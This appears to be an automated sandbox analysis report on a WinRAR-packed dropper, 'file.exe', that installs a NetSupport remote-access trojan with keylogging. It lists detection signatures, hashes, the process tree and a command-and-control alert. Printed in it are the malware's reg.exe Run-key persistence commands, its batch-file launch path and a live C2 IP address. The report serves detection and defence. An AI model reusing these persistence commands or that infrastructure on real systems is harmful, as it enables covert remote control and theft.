Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1562378
MD5:	a3cea314d888a08b79002656a9f4b927
SHA1:	396b9f96219785f0c80c69703dc623c23554affc
SHA256:	64356e6b4781925ef940695d869a826dc229e911919faf8729d8dfb34f31e61a
Tags:	exeuser-Bitsight
Infos:

Detection

NetSupport RAT

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

AI detected suspicious sample

Contains functionality to detect sleep reduction / modifications

Contains functionalty to change the wallpaper

Delayed program exit found

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Program Location with Network Connections

Uses cmd line tools excessively to alter registry or file data

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

File is packed with WinRar

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Uses the system / local time for branch decision (may execute only at specific dates)

Yara detected Keylogger Generic

Yara detected NetSupport remote tool

Classification

Process Tree

System is w10x64

file.exe (PID: 5988 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A3CEA314D888A08B79002656A9F4B927)

cmd.exe (PID: 2788 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 5336 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe" MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 4512 cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe" MD5: 227F63E1D9008B36BDBCC4B397780BE4)

shv.exe (PID: 5552 cmdline: C:\Users\Public\Netstat\shv.exe MD5: 8D9709FF7D9C83BD376E01912C734F0A)

reg.exe (PID: 5768 cmdline: REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe" MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 4544 cmdline: REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe" MD5: 227F63E1D9008B36BDBCC4B397780BE4)

shv.exe (PID: 6488 cmdline: C:\Users\Public\Netstat\shv.exe MD5: 8D9709FF7D9C83BD376E01912C734F0A)

shv.exe (PID: 1936 cmdline: "C:\Users\Public\Netstat\shv.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)

shv.exe (PID: 4000 cmdline: "C:\Users\Public\Netstat\shv.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)

shv.exe (PID: 3360 cmdline: "C:\Users\Public\Netstat\shv.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\Public\Netstat\pcicapi.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\Public\Netstat\shv.exe	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\Public\Netstat\PCICHEK.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\Public\Netstat\HTCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\Public\Netstat\TCCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\Public\Netstat\PCICL32.DLL	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\Public\Netstat\PCICL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000D.00000000.2347023437.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000E.00000002.2430920852.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000009.00000000.2159146896.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000000.2155681384.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000009.00000002.2162511343.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000D.00000002.2349971528.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000B.00000000.2256622126.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000E.00000002.2431151804.00000000010A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000E.00000000.2429867736.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000B.00000002.2263586732.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: file.exe PID: 5988	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: file.exe PID: 5988	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: shv.exe PID: 5552	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: shv.exe PID: 5552	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: shv.exe PID: 6488	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: shv.exe PID: 6488	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: shv.exe PID: 1936	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: shv.exe PID: 1936	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: shv.exe PID: 4000	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: shv.exe PID: 4000	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: shv.exe PID: 3360	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: shv.exe PID: 3360	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 39 entries

Unpacked PEs

Source	Rule	Description	Author
9.2.shv.exe.ab0000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.shv.exe.ab0000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
13.2.shv.exe.ab0000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
13.2.shv.exe.74a90000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
14.2.shv.exe.ab0000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
13.0.shv.exe.ab0000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
11.2.shv.exe.70030000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
14.2.shv.exe.70030000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.shv.exe.70030000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
13.2.shv.exe.70030000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
11.2.shv.exe.74a90000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
11.2.shv.exe.ab0000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
9.2.shv.exe.111b79e0.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
9.2.shv.exe.111b79e0.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.shv.exe.74a90000.6.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
9.2.shv.exe.70030000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
9.0.shv.exe.ab0000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.shv.exe.111b79e0.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
6.2.shv.exe.111b79e0.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
9.2.shv.exe.74a90000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.0.shv.exe.ab0000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
14.0.shv.exe.ab0000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
13.2.shv.exe.111b79e0.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
13.2.shv.exe.111b79e0.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
14.2.shv.exe.74a90000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
11.0.shv.exe.ab0000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
11.2.shv.exe.111b79e0.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
11.2.shv.exe.111b79e0.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0.3.file.exe.229e94ad820.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0.3.file.exe.229e94ad820.0.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
14.2.shv.exe.111b79e0.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
14.2.shv.exe.111b79e0.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.shv.exe.6d1c0000.3.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
11.2.shv.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
11.2.shv.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
9.2.shv.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
9.2.shv.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
14.2.shv.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
14.2.shv.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
13.2.shv.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
13.2.shv.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.shv.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
6.2.shv.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 38 entries

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Netstat\shv.exe, CommandLine: C:\Users\Public\Netstat\shv.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Netstat\shv.exe, NewProcessName: C:\Users\Public\Netstat\shv.exe, OriginalFileName: C:\Users\Public\Netstat\shv.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2788, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Netstat\shv.exe, ProcessId: 5552, ProcessName: shv.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Netstat\shv.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 5336, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 45.61.128.74, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Netstat\shv.exe, Initiated: true, ProcessId: 5552, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49708

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Netstat\shv.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 5336, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat

Sigma detected: Direct Autorun Keys Modification

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2788, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", ProcessId: 5336, ProcessName: reg.exe

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2788, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", ProcessId: 5336, ProcessName: reg.exe

Suricata Signatures

ETPRO MALWARE NetSupport RAT CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T15:10:10.376773+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49708	45.61.128.74	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Netstat\remcmdstub.exe	ReversingLabs: Detection: 13%
Source: C:\Users\Public\Netstat\shv.exe	ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.9% probability

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,		6_2_110AD570
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,		9_2_110AD570

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\Public\Netstat\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: msvcr100.i386.pdb source: shv.exe, shv.exe, 00000006.00000002.3996339764.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 00000009.00000002.2165257502.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000B.00000002.2264988650.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000D.00000002.2351625613.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000E.00000002.2432218131.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: shv.exe, 00000006.00000002.3996589650.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 00000009.00000002.2166045519.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000B.00000002.2265311157.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000D.00000002.2352005765.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000E.00000002.2432458267.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: shv.exe, 00000006.00000000.2155681384.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000000.2159146896.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000002.2162511343.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000000.2256622126.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000002.2263586732.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000D.00000000.2347023437.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000D.00000002.2349971528.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000002.2430920852.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000000.2429867736.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: shv.exe, 00000006.00000002.3996495464.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 00000009.00000002.2165773946.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000B.00000002.2265179419.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000D.00000002.2351793987.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000E.00000002.2432366354.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7940BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF70E7940BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7AB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF70E7AB190
